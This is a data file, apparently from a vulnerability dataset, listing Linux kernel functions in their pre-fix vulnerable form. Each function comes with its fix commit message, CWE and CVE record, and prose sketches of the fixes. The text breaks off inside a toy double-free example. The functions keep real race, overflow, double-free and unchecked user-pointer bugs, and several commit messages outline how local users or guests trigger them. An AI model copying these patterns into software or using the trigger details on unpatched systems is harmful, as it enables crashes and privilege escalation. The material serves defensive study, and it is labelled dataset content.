idx | project | commit_id | project_url | commit_url | commit_message | target | func | func_hash | file_name | file_hash | cwe | cve | cve_desc | nvd_url |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1,339 | linux | 86acdca1b63e6890540fa19495cfc708beff3d8b | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/86acdca1b63e6890540fa19495cfc708beff3d8b | fix autofs/afs/etc. magic mountpoint breakage
We end up trying to kfree() nd.last.name on open("/mnt/tmp", O_CREAT)
if /mnt/tmp is an autofs direct mount. The reason is that nd.last_type
is bogus here; we want LAST_BIND for everything of that kind and we
get LAST_NORM left over from finding the parent directory.
So make sure that it *is* set properly; set to LAST_BIND before
doing ->follow_link() - for normal symlinks it will be changed
by __vfs_follow_link() and everything else needs it set that way.
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | 1 | static __always_inline int __do_follow_link(struct path *path, struct nameidata *nd)
{
int error;
void *cookie;
struct dentry *dentry = path->dentry;
touch_atime(path->mnt, dentry);
nd_set_link(nd, NULL);
if (path->mnt != nd->path.mnt) {
path_to_nameidata(path, nd);
dget(dentry);
}
mntget(path->mnt);
cookie = dentry->d_inode->i_op->follow_link(dentry, nd);
error = PTR_ERR(cookie);
if (!IS_ERR(cookie)) {
char *s = nd_get_link(nd);
error = 0;
if (s)
error = __vfs_follow_link(nd, s);
else if (nd->last_type == LAST_BIND) {
error = force_reval_path(&nd->path, nd);
if (error)
path_put(&nd->path);
}
if (dentry->d_inode->i_op->put_link)
dentry->d_inode->i_op->put_link(dentry, nd, cookie);
}
return error;
}
| 256,736,984,301,789,380,000,000,000,000,000,000,000 | namei.c | 213,658,505,254,054,250,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2014-0203 | The __do_follow_link function in fs/namei.c in the Linux kernel before 2.6.33 does not properly handle the last pathname component during use of certain filesystems, which allows local users to cause a denial of service (incorrect free operations and system crash) via an open system call. | https://nvd.nist.gov/vuln/detail/CVE-2014-0203 |
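A minimal sketch of the fix described in the commit message above, reconstructed from that description rather than copied from the upstream diff: force last_type to LAST_BIND just before the ->follow_link() call inside __do_follow_link(), so only __vfs_follow_link() (i.e. ordinary symlinks) changes it back.

```c
/* Sketch reconstructed from the commit message, not the verbatim
 * upstream patch.  Magic links (autofs/afs/...) that never go through
 * __vfs_follow_link() now keep LAST_BIND, so the open(O_CREAT) path
 * no longer sees a stale LAST_NORM and kfree()s an nd.last.name that
 * was never allocated for it. */
nd->last_type = LAST_BIND;
cookie = dentry->d_inode->i_op->follow_link(dentry, nd);
```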
1,341 | linux | 4291086b1f081b869c6d79e5b7441633dc3ace00 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4291086b1f081b869c6d79e5b7441633dc3ace00 | n_tty: Fix n_tty_write crash when echoing in raw mode
The tty atomic_write_lock does not provide an exclusion guarantee for
the tty driver if the termios settings are LECHO & !OPOST. And since
it is unexpected and not allowed to call TTY buffer helpers like
tty_insert_flip_string concurrently, this may lead to crashes when
concurrent writers call pty_write. In that case the following two
writers:
* the ECHOing from a workqueue and
* pty_write from the process
race and can overflow the corresponding TTY buffer like follows.
If we look into tty_insert_flip_string_fixed_flag, there is:
int space = __tty_buffer_request_room(port, goal, flags);
struct tty_buffer *tb = port->buf.tail;
...
memcpy(char_buf_ptr(tb, tb->used), chars, space);
...
tb->used += space;
so the race of the two can result in something like this:
A                                 B
__tty_buffer_request_room
                                  __tty_buffer_request_room
memcpy(buf(tb->used), ...)
tb->used += space;
                                  memcpy(buf(tb->used), ...) ->BOOM
B's memcpy is past the tty_buffer due to the previous A's tb->used
increment.
Since the N_TTY line discipline input processing can output
concurrently with a tty write, obtain the N_TTY ldisc output_lock to
serialize echo output with normal tty writes. This ensures the tty
buffer helper tty_insert_flip_string is not called concurrently and
everything is fine.
Note that this is nicely reproducible by an ordinary user using
forkpty and some setup around that (raw termios + ECHO). And it is
present in kernels at least after commit
d945cb9cce20ac7143c2de8d88b187f62db99bdc (pty: Rework the pty layer to
use the normal buffering logic) in 2.6.31-rc3.
js: add more info to the commit log
js: switch to bool
js: lock unconditionally
js: lock only the tty->ops->write call
References: CVE-2014-0196
Reported-and-tested-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Alan Cox <alan@lxorguk.ukuu.org.uk>
Cc: <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | 1 | static ssize_t n_tty_write(struct tty_struct *tty, struct file *file,
const unsigned char *buf, size_t nr)
{
const unsigned char *b = buf;
DECLARE_WAITQUEUE(wait, current);
int c;
ssize_t retval = 0;
/* Job control check -- must be done at start (POSIX.1 7.1.1.4). */
if (L_TOSTOP(tty) && file->f_op->write != redirected_tty_write) {
retval = tty_check_change(tty);
if (retval)
return retval;
}
down_read(&tty->termios_rwsem);
/* Write out any echoed characters that are still pending */
process_echoes(tty);
add_wait_queue(&tty->write_wait, &wait);
while (1) {
set_current_state(TASK_INTERRUPTIBLE);
if (signal_pending(current)) {
retval = -ERESTARTSYS;
break;
}
if (tty_hung_up_p(file) || (tty->link && !tty->link->count)) {
retval = -EIO;
break;
}
if (O_OPOST(tty)) {
while (nr > 0) {
ssize_t num = process_output_block(tty, b, nr);
if (num < 0) {
if (num == -EAGAIN)
break;
retval = num;
goto break_out;
}
b += num;
nr -= num;
if (nr == 0)
break;
c = *b;
if (process_output(c, tty) < 0)
break;
b++; nr--;
}
if (tty->ops->flush_chars)
tty->ops->flush_chars(tty);
} else {
while (nr > 0) {
c = tty->ops->write(tty, b, nr);
if (c < 0) {
retval = c;
goto break_out;
}
if (!c)
break;
b += c;
nr -= c;
}
}
if (!nr)
break;
if (file->f_flags & O_NONBLOCK) {
retval = -EAGAIN;
break;
}
up_read(&tty->termios_rwsem);
schedule();
down_read(&tty->termios_rwsem);
}
break_out:
__set_current_state(TASK_RUNNING);
remove_wait_queue(&tty->write_wait, &wait);
if (b - buf != nr && tty->fasync)
set_bit(TTY_DO_WRITE_WAKEUP, &tty->flags);
up_read(&tty->termios_rwsem);
return (b - buf) ? b - buf : retval;
}
| 177,764,399,866,911,630,000,000,000,000,000,000,000 | n_tty.c | 13,693,576,808,205,118,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2014-0196 | The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings. | https://nvd.nist.gov/vuln/detail/CVE-2014-0196 |
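The race above is an unlocked read-modify-write on shared buffer state. A userspace toy model (hypothetical names, not kernel code; compile with `cc -pthread`) shows the pattern and the shape of the fix, which serializes both writers on one lock the way the patch takes the N_TTY output_lock around the tty->ops->write call:

```c
#include <pthread.h>
#include <stdio.h>
#include <string.h>

#define BUF_SZ 64

static char buf[BUF_SZ];
static int used;                  /* models tb->used */
static pthread_mutex_t output_lock = PTHREAD_MUTEX_INITIALIZER;

static void locked_write(const char *data, int len)
{
	pthread_mutex_lock(&output_lock); /* the fix: one writer at a time */
	int space = BUF_SZ - used;        /* models __tty_buffer_request_room */
	if (len > space)
		len = space;
	memcpy(buf + used, data, len);    /* copy at the reserved offset */
	used += len;                      /* ...and only then publish it */
	pthread_mutex_unlock(&output_lock);
}

static void *writer(void *arg)            /* plays both "A" and "B" */
{
	(void)arg;
	for (int i = 0; i < 1000; i++)
		locked_write("x", 1);
	return NULL;
}

int main(void)
{
	pthread_t a, b;
	pthread_create(&a, NULL, writer, NULL);
	pthread_create(&b, NULL, writer, NULL);
	pthread_join(a, NULL);
	pthread_join(b, NULL);
	printf("used=%d (never exceeds %d)\n", used, BUF_SZ);
	return 0;
}
```

Without the mutex, the space check and the `used` update can interleave exactly as in the A/B diagram above, and one writer's memcpy lands past the buffer.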
1,342 | linux | d8316f3991d207fe32881a9ac20241be8fa2bad0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/d8316f3991d207fe32881a9ac20241be8fa2bad0 | vhost: fix total length when packets are too short
When mergeable buffers are disabled, and the
incoming packet is too large for the rx buffer,
get_rx_bufs returns success.
This was intentional in order to make recvmsg
truncate the packet and then handle_rx would
detect err != sock_len and drop it.
Unfortunately we pass the original sock_len to
recvmsg - which means we use parts of iov not fully
validated.
Fix this up by detecting this overrun and doing packet drop
immediately.
CVE-2014-0077
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static void handle_rx(struct vhost_net *net)
{
struct vhost_net_virtqueue *nvq = &net->vqs[VHOST_NET_VQ_RX];
struct vhost_virtqueue *vq = &nvq->vq;
unsigned uninitialized_var(in), log;
struct vhost_log *vq_log;
struct msghdr msg = {
.msg_name = NULL,
.msg_namelen = 0,
.msg_control = NULL, /* FIXME: get and handle RX aux data. */
.msg_controllen = 0,
.msg_iov = vq->iov,
.msg_flags = MSG_DONTWAIT,
};
struct virtio_net_hdr_mrg_rxbuf hdr = {
.hdr.flags = 0,
.hdr.gso_type = VIRTIO_NET_HDR_GSO_NONE
};
size_t total_len = 0;
int err, mergeable;
s16 headcount;
size_t vhost_hlen, sock_hlen;
size_t vhost_len, sock_len;
struct socket *sock;
mutex_lock(&vq->mutex);
sock = vq->private_data;
if (!sock)
goto out;
vhost_disable_notify(&net->dev, vq);
vhost_hlen = nvq->vhost_hlen;
sock_hlen = nvq->sock_hlen;
vq_log = unlikely(vhost_has_feature(&net->dev, VHOST_F_LOG_ALL)) ?
vq->log : NULL;
mergeable = vhost_has_feature(&net->dev, VIRTIO_NET_F_MRG_RXBUF);
while ((sock_len = peek_head_len(sock->sk))) {
sock_len += sock_hlen;
vhost_len = sock_len + vhost_hlen;
headcount = get_rx_bufs(vq, vq->heads, vhost_len,
&in, vq_log, &log,
likely(mergeable) ? UIO_MAXIOV : 1);
/* On error, stop handling until the next kick. */
if (unlikely(headcount < 0))
break;
/* OK, now we need to know about added descriptors. */
if (!headcount) {
if (unlikely(vhost_enable_notify(&net->dev, vq))) {
/* They have slipped one in as we were
* doing that: check again. */
vhost_disable_notify(&net->dev, vq);
continue;
}
/* Nothing new? Wait for eventfd to tell us
* they refilled. */
break;
}
/* We don't need to be notified again. */
if (unlikely((vhost_hlen)))
/* Skip header. TODO: support TSO. */
move_iovec_hdr(vq->iov, nvq->hdr, vhost_hlen, in);
else
/* Copy the header for use in VIRTIO_NET_F_MRG_RXBUF:
* needed because recvmsg can modify msg_iov. */
copy_iovec_hdr(vq->iov, nvq->hdr, sock_hlen, in);
msg.msg_iovlen = in;
err = sock->ops->recvmsg(NULL, sock, &msg,
sock_len, MSG_DONTWAIT | MSG_TRUNC);
/* Userspace might have consumed the packet meanwhile:
* it's not supposed to do this usually, but might be hard
* to prevent. Discard data we got (if any) and keep going. */
if (unlikely(err != sock_len)) {
pr_debug("Discarded rx packet: "
" len %d, expected %zd\n", err, sock_len);
vhost_discard_vq_desc(vq, headcount);
continue;
}
if (unlikely(vhost_hlen) &&
memcpy_toiovecend(nvq->hdr, (unsigned char *)&hdr, 0,
vhost_hlen)) {
vq_err(vq, "Unable to write vnet_hdr at addr %p\n",
vq->iov->iov_base);
break;
}
/* TODO: Should check and handle checksum. */
if (likely(mergeable) &&
memcpy_toiovecend(nvq->hdr, (unsigned char *)&headcount,
offsetof(typeof(hdr), num_buffers),
sizeof hdr.num_buffers)) {
vq_err(vq, "Failed num_buffers write");
vhost_discard_vq_desc(vq, headcount);
break;
}
vhost_add_used_and_signal_n(&net->dev, vq, vq->heads,
headcount);
if (unlikely(vq_log))
vhost_log_write(vq, vq_log, log, vhost_len);
total_len += vhost_len;
if (unlikely(total_len >= VHOST_NET_WEIGHT)) {
vhost_poll_queue(&vq->poll);
break;
}
}
out:
mutex_unlock(&vq->mutex);
}
| 327,050,017,452,533,930,000,000,000,000,000,000,000 | net.c | 84,928,519,751,752,360,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2014-0077 | drivers/vhost/net.c in the Linux kernel before 3.13.10, when mergeable buffers are disabled, does not properly validate packet lengths, which allows guest OS users to cause a denial of service (memory corruption and host OS crash) or possibly gain privileges on the host OS via crafted packets, related to the handle_rx and get_rx_bufs functions. | https://nvd.nist.gov/vuln/detail/CVE-2014-0077 |
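A hedged sketch of the fix as the message describes it (details of the upstream diff may vary): get_rx_bufs signals the overrun by returning a headcount above UIO_MAXIOV, and handle_rx then truncates and discards the packet instead of handing partly-validated iov entries to recvmsg:

```c
/* Sketch following the commit description, not a verbatim diff. */
headcount = get_rx_bufs(vq, vq->heads, vhost_len, &in, vq_log, &log,
			likely(mergeable) ? UIO_MAXIOV : 1);
/* On overrun, truncate and discard the packet immediately. */
if (unlikely(headcount > UIO_MAXIOV)) {
	msg.msg_iovlen = 1;
	err = sock->ops->recvmsg(NULL, sock, &msg, 1,
				 MSG_DONTWAIT | MSG_TRUNC);
	pr_debug("Discarded rx packet: len %zd\n", sock_len);
	continue;
}
```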
1,343 | linux | 5d81de8e8667da7135d3a32a964087c0faf5483f | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/5d81de8e8667da7135d3a32a964087c0faf5483f | cifs: ensure that uncached writes handle unmapped areas correctly
It's possible for userland to pass down an iovec via writev() that has a
bogus user pointer in it. If that happens and we're doing an uncached
write, then we can end up getting fewer bytes than we expect from the
call to iov_iter_copy_from_user. This is CVE-2014-0069
cifs_iovec_write isn't set up to handle that situation however. It'll
blindly keep chugging through the page array and not filling those pages
with anything useful. Worse yet, we'll later end up with a negative
number in wdata->tailsz, which will confuse the sending routines and
cause an oops at the very least.
Fix this by having the copy phase of cifs_iovec_write stop copying data
in this situation and send the last write as a short one. At the same
time, we want to avoid sending a zero-length write to the server, so
break out of the loop and set rc to -EFAULT if that happens. This also
allows us to handle the case where no address in the iovec is valid.
[Note: Marking this for stable on v3.4+ kernels, but kernels as old as
v2.6.38 may have a similar problem and may need similar fix]
Cc: <stable@vger.kernel.org> # v3.4+
Reviewed-by: Pavel Shilovsky <piastry@etersoft.ru>
Reported-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Steve French <smfrench@gmail.com> | 1 | cifs_iovec_write(struct file *file, const struct iovec *iov,
unsigned long nr_segs, loff_t *poffset)
{
unsigned long nr_pages, i;
size_t copied, len, cur_len;
ssize_t total_written = 0;
loff_t offset;
struct iov_iter it;
struct cifsFileInfo *open_file;
struct cifs_tcon *tcon;
struct cifs_sb_info *cifs_sb;
struct cifs_writedata *wdata, *tmp;
struct list_head wdata_list;
int rc;
pid_t pid;
len = iov_length(iov, nr_segs);
if (!len)
return 0;
rc = generic_write_checks(file, poffset, &len, 0);
if (rc)
return rc;
INIT_LIST_HEAD(&wdata_list);
cifs_sb = CIFS_SB(file->f_path.dentry->d_sb);
open_file = file->private_data;
tcon = tlink_tcon(open_file->tlink);
if (!tcon->ses->server->ops->async_writev)
return -ENOSYS;
offset = *poffset;
if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
pid = open_file->pid;
else
pid = current->tgid;
iov_iter_init(&it, iov, nr_segs, len, 0);
do {
size_t save_len;
nr_pages = get_numpages(cifs_sb->wsize, len, &cur_len);
wdata = cifs_writedata_alloc(nr_pages,
cifs_uncached_writev_complete);
if (!wdata) {
rc = -ENOMEM;
break;
}
rc = cifs_write_allocate_pages(wdata->pages, nr_pages);
if (rc) {
kfree(wdata);
break;
}
save_len = cur_len;
for (i = 0; i < nr_pages; i++) {
copied = min_t(const size_t, cur_len, PAGE_SIZE);
copied = iov_iter_copy_from_user(wdata->pages[i], &it,
0, copied);
cur_len -= copied;
iov_iter_advance(&it, copied);
}
cur_len = save_len - cur_len;
wdata->sync_mode = WB_SYNC_ALL;
wdata->nr_pages = nr_pages;
wdata->offset = (__u64)offset;
wdata->cfile = cifsFileInfo_get(open_file);
wdata->pid = pid;
wdata->bytes = cur_len;
wdata->pagesz = PAGE_SIZE;
wdata->tailsz = cur_len - ((nr_pages - 1) * PAGE_SIZE);
rc = cifs_uncached_retry_writev(wdata);
if (rc) {
kref_put(&wdata->refcount,
cifs_uncached_writedata_release);
break;
}
list_add_tail(&wdata->list, &wdata_list);
offset += cur_len;
len -= cur_len;
} while (len > 0);
/*
* If at least one write was successfully sent, then discard any rc
* value from the later writes. If the other write succeeds, then
* we'll end up returning whatever was written. If it fails, then
* we'll get a new rc value from that.
*/
if (!list_empty(&wdata_list))
rc = 0;
/*
* Wait for and collect replies for any successful sends in order of
* increasing offset. Once an error is hit or we get a fatal signal
* while waiting, then return without waiting for any more replies.
*/
restart_loop:
list_for_each_entry_safe(wdata, tmp, &wdata_list, list) {
if (!rc) {
/* FIXME: freezable too? */
rc = wait_for_completion_killable(&wdata->done);
if (rc)
rc = -EINTR;
else if (wdata->result)
rc = wdata->result;
else
total_written += wdata->bytes;
/* resend call if it's a retryable error */
if (rc == -EAGAIN) {
rc = cifs_uncached_retry_writev(wdata);
goto restart_loop;
}
}
list_del_init(&wdata->list);
kref_put(&wdata->refcount, cifs_uncached_writedata_release);
}
if (total_written > 0)
*poffset += total_written;
cifs_stats_bytes_written(tcon, total_written);
return total_written ? total_written : (ssize_t)rc;
}
| 82,332,909,522,185,400,000,000,000,000,000,000,000 | file.c | 284,112,246,344,305,900,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2014-0069 | The cifs_iovec_write function in fs/cifs/file.c in the Linux kernel through 3.13.5 does not properly handle uncached write operations that copy fewer than the requested number of bytes, which allows local users to obtain sensitive information from kernel memory, cause a denial of service (memory corruption and system crash), or possibly gain privileges via a writev system call with a crafted pointer. | https://nvd.nist.gov/vuln/detail/CVE-2014-0069 |
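A hedged sketch of the copy-phase change the message describes (not the verbatim upstream diff): stop on a short copy from the iovec, size the write by what was actually copied, and bail out with -EFAULT when nothing could be copied at all:

```c
/* Sketch following the commit description, not a verbatim diff. */
save_len = cur_len;
for (i = 0; i < nr_pages; i++) {
	copied = min_t(const size_t, cur_len, PAGE_SIZE);
	copied = iov_iter_copy_from_user(wdata->pages[i], &it, 0, copied);
	cur_len -= copied;
	iov_iter_advance(&it, copied);
	if (copied < PAGE_SIZE)
		break;			/* bogus user pointer: stop copying */
}
cur_len = save_len - cur_len;		/* bytes actually copied */
if (!cur_len) {
	rc = -EFAULT;			/* no valid address in the iovec */
	break;				/* never send a zero-length write
					   (real code also frees wdata here) */
}
wdata->bytes = cur_len;			/* send the last write short */
```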
1,344 | linux | a08d3b3b99efd509133946056531cdf8f3a0c09b | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/a08d3b3b99efd509133946056531cdf8f3a0c09b | kvm: x86: fix emulator buffer overflow (CVE-2014-0049)
The problem occurs when the guest performs a pusha with the stack
address pointing to an mmio address (or an invalid guest physical
address) to start with, but then extending into an ordinary guest
physical address. When doing repeated emulated pushes
emulator_read_write sets mmio_needed to 1 on the first one. On a
later push when the stack points to regular memory,
mmio_nr_fragments is set to 0, but mmio_needed is not set to 0.
As a result, KVM exits to userspace, and then returns to
complete_emulated_mmio. In complete_emulated_mmio
vcpu->mmio_cur_fragment is incremented. The termination condition of
vcpu->mmio_cur_fragment == vcpu->mmio_nr_fragments is never achieved.
The code bounces back and forth to userspace, incrementing
mmio_cur_fragment past its buffer. If the guest does nothing else it
eventually leads to a crash on a memcpy from an invalid memory address.
However, if guest code can cause the vm to be destroyed in another
vcpu with excellent timing, then kvm_clear_async_pf_completion_queue
can be used by the guest to control the data that's pointed to by the
call to cancel_work_item, which can be used to gain execution.
Fixes: f78146b0f9230765c6315b2e14f56112513389ad
Signed-off-by: Andrew Honig <ahonig@google.com>
Cc: stable@vger.kernel.org (3.5+)
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com> | 1 | static int complete_emulated_mmio(struct kvm_vcpu *vcpu)
{
struct kvm_run *run = vcpu->run;
struct kvm_mmio_fragment *frag;
unsigned len;
BUG_ON(!vcpu->mmio_needed);
/* Complete previous fragment */
frag = &vcpu->mmio_fragments[vcpu->mmio_cur_fragment];
len = min(8u, frag->len);
if (!vcpu->mmio_is_write)
memcpy(frag->data, run->mmio.data, len);
if (frag->len <= 8) {
/* Switch to the next fragment. */
frag++;
vcpu->mmio_cur_fragment++;
} else {
/* Go forward to the next mmio piece. */
frag->data += len;
frag->gpa += len;
frag->len -= len;
}
if (vcpu->mmio_cur_fragment == vcpu->mmio_nr_fragments) {
vcpu->mmio_needed = 0;
/* FIXME: return into emulator if single-stepping. */
if (vcpu->mmio_is_write)
return 1;
vcpu->mmio_read_completed = 1;
return complete_emulated_io(vcpu);
}
run->exit_reason = KVM_EXIT_MMIO;
run->mmio.phys_addr = frag->gpa;
if (vcpu->mmio_is_write)
memcpy(run->mmio.data, frag->data, min(8u, frag->len));
run->mmio.len = min(8u, frag->len);
run->mmio.is_write = vcpu->mmio_is_write;
vcpu->arch.complete_userspace_io = complete_emulated_mmio;
return 0;
}
| 64,111,150,231,177,240,000,000,000,000,000,000,000 | x86.c | 98,159,114,997,778,440,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2014-0049 | Buffer overflow in the complete_emulated_mmio function in arch/x86/kvm/x86.c in the Linux kernel before 3.13.6 allows guest OS users to execute arbitrary code on the host OS by leveraging a loop that triggers an invalid memory copy affecting certain cancel_work_item data. | https://nvd.nist.gov/vuln/detail/CVE-2014-0049 |
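The overflow is an unchecked array cursor: mmio_needed stays set while mmio_nr_fragments is 0, so the `mmio_cur_fragment == mmio_nr_fragments` test can never fire and `frag` walks off the end of mmio_fragments[]. A hypothetical hardening sketch, explicitly not the upstream patch (which reworks the fragment bookkeeping), bounds the cursor before indexing:

```c
/* Hypothetical hardening, NOT the upstream fix: refuse to index
 * mmio_fragments[] with a cursor at or past mmio_nr_fragments - the
 * exact state a stale mmio_needed flag can leave behind. */
if (vcpu->mmio_cur_fragment >= vcpu->mmio_nr_fragments) {
	vcpu->mmio_needed = 0;	/* drop the stale emulation state */
	return 1;		/* re-enter the guest */
}
frag = &vcpu->mmio_fragments[vcpu->mmio_cur_fragment];
```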
1,345 | linux | 2def2ef2ae5f3990aabdbe8a755911902707d268 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/2def2ef2ae5f3990aabdbe8a755911902707d268 | x86, x32: Correct invalid use of user timespec in the kernel
The x32 case for the recvmsg() timeout handling is broken:
asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
unsigned int vlen, unsigned int flags,
struct compat_timespec __user *timeout)
{
int datagrams;
struct timespec ktspec;
if (flags & MSG_CMSG_COMPAT)
return -EINVAL;
if (COMPAT_USE_64BIT_TIME)
return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT,
(struct timespec *) timeout);
...
The timeout pointer parameter is provided by userland (hence the __user
annotation) but for x32 syscalls it's simply cast to a kernel pointer
and is passed to __sys_recvmmsg which will eventually directly
dereference it for both reading and writing. Other callers to
__sys_recvmmsg properly copy from userland to the kernel first.
The bug was introduced by commit ee4fa23c4bfc ("compat: Use
COMPAT_USE_64BIT_TIME in net/compat.c") and should affect all kernels
since 3.4 (and perhaps vendor kernels if they backported x32 support
along with this code).
Note that CONFIG_X86_X32_ABI gets enabled at build time and only if
CONFIG_X86_X32 is enabled and ld can build x32 executables.
Other uses of COMPAT_USE_64BIT_TIME seem fine.
This addresses CVE-2014-0038.
Signed-off-by: PaX Team <pageexec@freemail.hu>
Signed-off-by: H. Peter Anvin <hpa@linux.intel.com>
Cc: <stable@vger.kernel.org> # v3.4+
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | 1 | asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
unsigned int vlen, unsigned int flags,
struct compat_timespec __user *timeout)
{
int datagrams;
struct timespec ktspec;
if (flags & MSG_CMSG_COMPAT)
return -EINVAL;
if (COMPAT_USE_64BIT_TIME)
return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT,
(struct timespec *) timeout);
if (timeout == NULL)
return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT, NULL);
if (get_compat_timespec(&ktspec, timeout))
return -EFAULT;
datagrams = __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT, &ktspec);
if (datagrams > 0 && put_compat_timespec(&ktspec, timeout))
datagrams = -EFAULT;
return datagrams;
}
| 89,530,709,225,040,190,000,000,000,000,000,000,000 | compat.c | 107,634,465,611,674,530,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2014-0038 | The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter. | https://nvd.nist.gov/vuln/detail/CVE-2014-0038 |
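A sketch of the safe pattern for the x32 path (per the commit message; the upstream fix, as described, drops the COMPAT_USE_64BIT_TIME shortcut and copies through compat helpers): a __user pointer is always copied into kernel memory, never cast and dereferenced:

```c
/* Sketch of the fixed flow; helper names per the era's compat API. */
struct timespec ktspec;

if (timeout == NULL)
	return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
			      flags | MSG_CMSG_COMPAT, NULL);
if (compat_get_timespec(&ktspec, timeout))	/* copy_from_user inside */
	return -EFAULT;
datagrams = __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
			   flags | MSG_CMSG_COMPAT, &ktspec);
if (datagrams > 0 && compat_put_timespec(&ktspec, timeout))
	datagrams = -EFAULT;
return datagrams;
```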
1,346 | linux | d558023207e008a4476a3b7bb8706b2a2bf5d84f | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/d558023207e008a4476a3b7bb8706b2a2bf5d84f | aio: prevent double free in ioctx_alloc
ioctx_alloc() calls aio_setup_ring() to allocate a ring. If aio_setup_ring()
fails to do so, it calls aio_free_ring() before returning, but
ioctx_alloc() then calls aio_free_ring() again, causing a double free of
the ring.
This is easily reproducible from userspace.
Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: Benjamin LaHaise <bcrl@kvack.org> | 1 | static struct kioctx *ioctx_alloc(unsigned nr_events)
{
struct mm_struct *mm = current->mm;
struct kioctx *ctx;
int err = -ENOMEM;
/*
* We keep track of the number of available ringbuffer slots, to prevent
* overflow (reqs_available), and we also use percpu counters for this.
*
* So since up to half the slots might be on other cpu's percpu counters
* and unavailable, double nr_events so userspace sees what they
* expected: additionally, we move req_batch slots to/from percpu
* counters at a time, so make sure that isn't 0:
*/
nr_events = max(nr_events, num_possible_cpus() * 4);
nr_events *= 2;
/* Prevent overflows */
if ((nr_events > (0x10000000U / sizeof(struct io_event))) ||
(nr_events > (0x10000000U / sizeof(struct kiocb)))) {
pr_debug("ENOMEM: nr_events too high\n");
return ERR_PTR(-EINVAL);
}
if (!nr_events || (unsigned long)nr_events > (aio_max_nr * 2UL))
return ERR_PTR(-EAGAIN);
ctx = kmem_cache_zalloc(kioctx_cachep, GFP_KERNEL);
if (!ctx)
return ERR_PTR(-ENOMEM);
ctx->max_reqs = nr_events;
if (percpu_ref_init(&ctx->users, free_ioctx_users))
goto err;
if (percpu_ref_init(&ctx->reqs, free_ioctx_reqs))
goto err;
spin_lock_init(&ctx->ctx_lock);
spin_lock_init(&ctx->completion_lock);
mutex_init(&ctx->ring_lock);
init_waitqueue_head(&ctx->wait);
INIT_LIST_HEAD(&ctx->active_reqs);
ctx->cpu = alloc_percpu(struct kioctx_cpu);
if (!ctx->cpu)
goto err;
if (aio_setup_ring(ctx) < 0)
goto err;
atomic_set(&ctx->reqs_available, ctx->nr_events - 1);
ctx->req_batch = (ctx->nr_events - 1) / (num_possible_cpus() * 4);
if (ctx->req_batch < 1)
ctx->req_batch = 1;
/* limit the number of system wide aios */
spin_lock(&aio_nr_lock);
if (aio_nr + nr_events > (aio_max_nr * 2UL) ||
aio_nr + nr_events < aio_nr) {
spin_unlock(&aio_nr_lock);
err = -EAGAIN;
goto err;
}
aio_nr += ctx->max_reqs;
spin_unlock(&aio_nr_lock);
percpu_ref_get(&ctx->users); /* io_setup() will drop this ref */
err = ioctx_add_table(ctx, mm);
if (err)
goto err_cleanup;
pr_debug("allocated ioctx %p[%ld]: mm=%p mask=0x%x\n",
ctx, ctx->user_id, mm, ctx->nr_events);
return ctx;
err_cleanup:
aio_nr_sub(ctx->max_reqs);
err:
aio_free_ring(ctx);
free_percpu(ctx->cpu);
free_percpu(ctx->reqs.pcpu_count);
free_percpu(ctx->users.pcpu_count);
kmem_cache_free(kioctx_cachep, ctx);
pr_debug("error allocating ioctx %d\n", err);
return ERR_PTR(err);
}
| 338,752,304,203,713,800,000,000,000,000,000,000,000 | aio.c | 50,064,682,128,123,810,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2013-7348 | Double free vulnerability in the ioctx_alloc function in fs/aio.c in the Linux kernel before 3.12.4 allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via vectors involving an error condition in the aio_setup_ring function. | https://nvd.nist.gov/vuln/detail/CVE-2013-7348 |
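A userspace toy model of the double free (hypothetical names, not kernel code; runnable as-is): the callee frees the ring on failure and the caller's common error path frees it again. Nulling the pointer after the callee's cleanup, or splitting the error labels as the patch does, breaks the pattern:

```c
#include <stdlib.h>

struct ring { char *pages; };

static int setup_ring(struct ring *r)	/* models aio_setup_ring() */
{
	r->pages = malloc(4096);
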